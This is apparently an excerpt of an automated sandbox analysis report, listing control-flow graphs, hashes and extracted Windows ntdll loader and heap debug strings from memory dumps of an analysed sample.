                                                      control_flow_graph 1427 378da670-378da6e9 call 37812410 * 2 RtlDebugPrintTimes 1433 378da89f-378da8c4 call 378125b0 * 2 call 37844c30 1427->1433 1434 378da6ef-378da6fa 1427->1434 1436 378da6fc-378da709 1434->1436 1437 378da724 1434->1437 1439 378da70f-378da715 1436->1439 1440 378da70b-378da70d 1436->1440 1441 378da728-378da734 1437->1441 1443 378da71b-378da722 1439->1443 1444 378da7f3-378da7f5 1439->1444 1440->1439 1445 378da741-378da743 1441->1445 1443->1441 1447 378da81f-378da821 1444->1447 1448 378da745-378da747 1445->1448 1449 378da736-378da73c 1445->1449 1450 378da755-378da77d RtlDebugPrintTimes 1447->1450 1451 378da827-378da834 1447->1451 1448->1447 1453 378da74c-378da750 1449->1453 1454 378da73e 1449->1454 1450->1433 1463 378da783-378da7a0 RtlDebugPrintTimes 1450->1463 1455 378da85a-378da866 1451->1455 1456 378da836-378da843 1451->1456 1458 378da86c-378da86e 1453->1458 1454->1445 1461 378da87b-378da87d 1455->1461 1459 378da84b-378da851 1456->1459 1460 378da845-378da849 1456->1460 1458->1447 1464 378da96b-378da96d 1459->1464 1465 378da857 1459->1465 1460->1459 1466 378da87f-378da881 1461->1466 1467 378da870-378da876 1461->1467 1463->1433 1475 378da7a6-378da7cc RtlDebugPrintTimes 1463->1475 1468 378da883-378da889 1464->1468 1465->1455 1466->1468 1469 378da878 1467->1469 1470 378da8c7-378da8cb 1467->1470 1473 378da88b-378da89d RtlDebugPrintTimes 1468->1473 1474 378da8d0-378da8f4 RtlDebugPrintTimes 1468->1474 1469->1461 1472 378da99f-378da9a1 1470->1472 1473->1433 1474->1433 1479 378da8f6-378da913 RtlDebugPrintTimes 1474->1479 1475->1433 1480 378da7d2-378da7d4 1475->1480 1479->1433 1487 378da915-378da944 RtlDebugPrintTimes 1479->1487 1481 378da7f7-378da80a 1480->1481 1482 378da7d6-378da7e3 1480->1482 1486 378da817-378da819 1481->1486 1484 378da7eb-378da7f1 1482->1484 1485 378da7e5-378da7e9 1482->1485 1484->1444 1484->1481 1485->1484 1488 378da80c-378da812 1486->1488 1489 378da81b-378da81d 1486->1489 1487->1433 1493 378da94a-378da94c 1487->1493 1491 378da868-378da86a 1488->1491 1492 378da814 1488->1492 1489->1447 1491->1458 1492->1486 1494 378da94e-378da95b 1493->1494 1495 378da972-378da985 1493->1495 1496 378da95d-378da961 1494->1496 1497 378da963-378da969 1494->1497 1498 378da992-378da994 1495->1498 1496->1497 1497->1464 1497->1495 1499 378da987-378da98d 1498->1499 1500 378da996 1498->1500 1501 378da98f 1499->1501 1502 378da99b-378da99d 1499->1502 1500->1466 1501->1498 1502->1472
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: HEAP:
                                                      • API String ID: 3446177414-2466845122
                                                      • Opcode ID: 44d8c97039e07269a09cdd9bd1628b6124892c86211c3dd72934537f04650499
                                                      • Instruction ID: f206a485d9e62ef6d52769c8e96f4cf009bc2576bb00f77c6e1b6a90339486c7
                                                      • Opcode Fuzzy Hash: 44d8c97039e07269a09cdd9bd1628b6124892c86211c3dd72934537f04650499
                                                      • Instruction Fuzzy Hash: 74A17875A043158FD704CE2CC8D0A6ABBE6FF98360F254569E945EB310EB74EC46CB92

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1503 37837630-37837651 1504 37837653-3783766f call 3780e660 1503->1504 1505 3783768b-37837699 call 37844c30 1503->1505 1510 37837675-37837682 1504->1510 1511 37874638 1504->1511 1512 37837684 1510->1512 1513 3783769a-378376a9 call 37837818 1510->1513 1515 3787463f-37874645 1511->1515 1512->1505 1519 37837701-3783770a 1513->1519 1520 378376ab-378376c1 call 378377cd 1513->1520 1517 378376c7-378376d0 call 37837728 1515->1517 1518 3787464b-378746b8 call 3788f290 call 37849020 RtlDebugPrintTimes BaseQueryModuleData 1515->1518 1517->1519 1527 378376d2 1517->1527 1518->1517 1535 378746be-378746c6 1518->1535 1524 378376d8-378376e1 1519->1524 1520->1515 1520->1517 1529 378376e3-378376f2 call 3783771b 1524->1529 1530 3783770c-3783770e 1524->1530 1527->1524 1534 378376f4-378376f6 1529->1534 1530->1534 1537 37837710-37837719 1534->1537 1538 378376f8-378376fa 1534->1538 1535->1517 1539 378746cc-378746d3 1535->1539 1537->1538 1538->1512 1540 378376fc 1538->1540 1539->1517 1541 378746d9-378746e4 1539->1541 1542 378747be-378747d0 call 37842c50 1540->1542 1543 378746ea-37874723 call 3788f290 call 3784aaa0 1541->1543 1544 378747b9 call 37844d48 1541->1544 1542->1512 1552 37874725-37874736 call 3788f290 1543->1552 1553 3787473b-3787476b call 3788f290 1543->1553 1544->1542 1552->1519 1553->1517 1558 37874771-3787477f call 3784a770 1553->1558 1561 37874786-378747a3 call 3788f290 call 3787cf9e 1558->1561 1562 37874781-37874783 1558->1562 1561->1517 1567 378747a9-378747b2 1561->1567 1562->1561 1567->1558 1568 378747b4 1567->1568 1568->1517
                                                      Strings
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37874725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 378746FC
                                                      • ExecuteOptions, xrefs: 378746A0
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 37874742
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37874655
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 37874787
                                                      • Execute=1, xrefs: 37874713
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 6360aa34d5c9329076b64f0e4046a8d718a85885c99b0079a4ffd74eed6c9bf8
                                                      • Instruction ID: 6ce3cf993184c79afe6c3616164bd085c9248b8a9559240d48c4f67390da640b
                                                      • Opcode Fuzzy Hash: 6360aa34d5c9329076b64f0e4046a8d718a85885c99b0079a4ffd74eed6c9bf8
                                                      • Instruction Fuzzy Hash: F751377960121DBAFB10DEACDCD5FAA77A8AF24350F4000ADD519AB190EB70EE45CF91
                                                      Strings
                                                      • SsHd, xrefs: 3781A3E4
                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 378679FA
                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 378679D5
                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 37867AE6
                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 378679D0, 378679F5
                                                      • Actx , xrefs: 37867A0C, 37867A73
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                      • API String ID: 0-1988757188
                                                      • Opcode ID: ee319c6ea476de162d7bad1435fd97115889f3220cb3f104750eb54f52010c38
                                                      • Instruction ID: 140f9c62e50a10abe2b58158612e5a371240ca9ef0ac59a0ca53ee7ed6da2552
                                                      • Opcode Fuzzy Hash: ee319c6ea476de162d7bad1435fd97115889f3220cb3f104750eb54f52010c38
                                                      • Instruction Fuzzy Hash: 4AE1D8746043019FE710CE65C8D4BAAB7E5BFA4364F504A2DF965CB290EB31E945CB83
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                      • API String ID: 3446177414-4227709934
                                                      • Opcode ID: 4c30d8203a2371a61a94ef800c2ec53ec2537bf2d33f683bbf03970964146cc0
                                                      • Instruction ID: 8db9047c851930948defd802b9ddd194dabce92ae5191649fa52e00dcbea7c87
                                                      • Opcode Fuzzy Hash: 4c30d8203a2371a61a94ef800c2ec53ec2537bf2d33f683bbf03970964146cc0
                                                      • Instruction Fuzzy Hash: 7D4174BAA00249EFDB01DF9AC980ADEBBB5FF58354F100155E925BB341D735A912CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                      • API String ID: 3446177414-3492000579
                                                      • Opcode ID: 3598642c81dce46968d019fb344eb4a14ce2035165e54a76c509cf7187527a8d
                                                      • Instruction ID: ad797107dd160038a9252594207b4f9589fdb2d87b89ae3774a688e31282798e
                                                      • Opcode Fuzzy Hash: 3598642c81dce46968d019fb344eb4a14ce2035165e54a76c509cf7187527a8d
                                                      • Instruction Fuzzy Hash: 2D71CB71904689DFDB01CFA8D440AADFBF2BF69320F54805AE445AB352CB3AE981CF51
                                                      APIs
                                                      Strings
                                                      • LdrpLoadShimEngine, xrefs: 37859ABB, 37859AFC
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 37859AC5, 37859B06
                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37859AF6
                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37859AB4
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 3446177414-3589223738
                                                      • Opcode ID: 2c3024d59a609c1b25f201d2ac0a2f1030db0bdf23eedf7c7210ddf23ee5143f
                                                      • Instruction ID: e88d0b678574123fbbbc2fdf610e8f819559bbaaa6c90bb910caad41f57b963d
                                                      • Opcode Fuzzy Hash: 2c3024d59a609c1b25f201d2ac0a2f1030db0bdf23eedf7c7210ddf23ee5143f
                                                      • Instruction Fuzzy Hash: 45512236A003589FDB14DB68CC49FAD7BB6AB54314F000169E450FF295DB79AC42CB92
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                      • API String ID: 3446177414-3224558752
                                                      • Opcode ID: b8c37130a2b645e073367b1231615b553acf714e037014819013e7ba1481ad8f
                                                      • Instruction ID: cd7508950e7fb657681599148eed09e7e3399af0502800bd58d67c4e184099a4
                                                      • Opcode Fuzzy Hash: b8c37130a2b645e073367b1231615b553acf714e037014819013e7ba1481ad8f
                                                      • Instruction Fuzzy Hash: 4441F475500744EFE701CF28C599BAABBA4EF25379F108569E5119B690CB78E8C0CB92
                                                      APIs
                                                      Strings
                                                      • ---------------------------------------, xrefs: 378AF279
                                                      • HEAP: , xrefs: 378AF15D
                                                      • Entry Heap Size , xrefs: 378AF26D
                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 378AF263
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                      • API String ID: 3446177414-1102453626
                                                      • Opcode ID: f18da85ed4d10bf9671f20399eb4546d5fd1e56230d9b43d6b068f27ff91d4b0
                                                      • Instruction ID: 4349d86b1ec080424c26dc456f9b002d241c24890bb53785c4d57e3167672a68
                                                      • Opcode Fuzzy Hash: f18da85ed4d10bf9671f20399eb4546d5fd1e56230d9b43d6b068f27ff91d4b0
                                                      • Instruction Fuzzy Hash: 76419D39A00219DFC745CF18D885A19BBF5FF593A4B26816AD418EB311DB36EC42CF90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                      • API String ID: 3446177414-1222099010
                                                      • Opcode ID: 678e7dead2e3fd6ea848581465ce0669138aa4278cc47ac85143a3021637a841
                                                      • Instruction ID: 45af9588498bce7a13590b1b4ba386ea2999a47fa25881a20b20fd62f54c8353
                                                      • Opcode Fuzzy Hash: 678e7dead2e3fd6ea848581465ce0669138aa4278cc47ac85143a3021637a841
                                                      • Instruction Fuzzy Hash: F831D4351147C8EFE312CB28C51DB967BE4EB11778F004499F4559B7A1CBB9E881CB62
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: 35e74d8325df61e765b8420a49bcfcbef51c1d2302f19a0369050a47ddae7d37
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 120223B1608345AFD304DF28C490B6BBBE5EFD8750F508A2DF9988B260DB75E905CB52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 74dcb24e71afb3b7ba8c42ec34732fee8b4352deed1c2bbbe63924fad15480cb
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 9C819E78E0534D9FEB048F6CC8917EEBFA2BF653A0F54415AD860A7291CBB4A8418F51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: $$@
                                                      • API String ID: 3446177414-1194432280
                                                      • Opcode ID: 158b8d423294793486234135b5628259c37043bf1a32464ed51b06d6af8e8793
                                                      • Instruction ID: 15fc55230c9f9a12719652527870234751c279430083f93f36690e7542668f4f
                                                      • Opcode Fuzzy Hash: 158b8d423294793486234135b5628259c37043bf1a32464ed51b06d6af8e8793
                                                      • Instruction Fuzzy Hash: CC813A75D00269AFDB21CF54CC45BEAB7B8AB18754F0041EAEA19B7280D7349E85CFA1
                                                      APIs
                                                      Strings
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3787362F
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 37873640, 3787366C
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 3787365C
                                                      • LdrpFindDllActivationContext, xrefs: 37873636, 37873662
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 3446177414-3779518884
                                                      • Opcode ID: c1e7e4e5bd40a997f13bbfc3b562000a4e8fdc5f2a54a39292c1a25f62b06c7c
                                                      • Instruction ID: c2fa0fcffca13538d1a1bd7334f4632c643bfce9f8664616221c61a98c112110
                                                      • Opcode Fuzzy Hash: c1e7e4e5bd40a997f13bbfc3b562000a4e8fdc5f2a54a39292c1a25f62b06c7c
                                                      • Instruction Fuzzy Hash: 8031277E902355AEFB51AE0CC84CB3577A4EB253B4F4241A6E40CA7660DB64EC80CBD2
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 3786A998
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3786A992
                                                      • TG}7, xrefs: 37822462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3786A9A2
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG}7$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1954810883
                                                      • Opcode ID: a89d8fb24c2b51fcee416fefec04f7bd7aadb944ab3f1bc1b853468c29f31e2b
                                                      • Instruction ID: 144f2280db09b6c835b65b8f03fb947b91438c25395bb2d997879dd0ebb349d3
                                                      • Opcode Fuzzy Hash: a89d8fb24c2b51fcee416fefec04f7bd7aadb944ab3f1bc1b853468c29f31e2b
                                                      • Instruction Fuzzy Hash: 4A312875740305FFE7109F59DC85FAA7BB5FB94754F22005AE510B7240DB78A882CB82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 3bb161c8fbd9d9ec1a391ffa2f4c03a372df89a5edc5ceddaa50310a928d1358
                                                      • Instruction ID: 3666825ff07997b2b5267dee0419d4578590c72734f31b118dbd142ba52d95c9
                                                      • Opcode Fuzzy Hash: 3bb161c8fbd9d9ec1a391ffa2f4c03a372df89a5edc5ceddaa50310a928d1358
                                                      • Instruction Fuzzy Hash: 7C2131B6A00119ABDB10DE79DC40AAE7BE8AFA8794F440116E955E3300E735E9028BE1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 3446177414-3610490719
                                                      • Opcode ID: 4c87df79976c7c62ffc4e575e70c1e02e7db22c06e56137b107ac5158f10de8f
                                                      • Instruction ID: 15fe8981db371c28208c8eaaa4b37804ef3f409043ad8ec2804f76a1bad60f9e
                                                      • Opcode Fuzzy Hash: 4c87df79976c7c62ffc4e575e70c1e02e7db22c06e56137b107ac5158f10de8f
                                                      • Instruction Fuzzy Hash: B8911171305741DFE315CF28CA88B2AB7A6BF55760F001469E8549F780DF3AE842CBA6
                                                      APIs
                                                      Strings
                                                      • Failed to allocated memory for shimmed module list, xrefs: 3786A10F
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3786A121
                                                      • LdrpCheckModule, xrefs: 3786A117
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 3446177414-161242083
                                                      • Opcode ID: 7d5bf0246ad89462951a4106fbcce66bcc182b707a1fff53173e904c6996c566
                                                      • Instruction ID: e3ec59dbd5e7ec912bb3f449320e5d0bd21769d7b8923b51945920d77d4e4336
                                                      • Opcode Fuzzy Hash: 7d5bf0246ad89462951a4106fbcce66bcc182b707a1fff53173e904c6996c566
                                                      • Instruction Fuzzy Hash: 4D71D3B4A00209EFDB04DF68C985BAEBBF4FB58324F14406DD511EB651E738A982DF52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
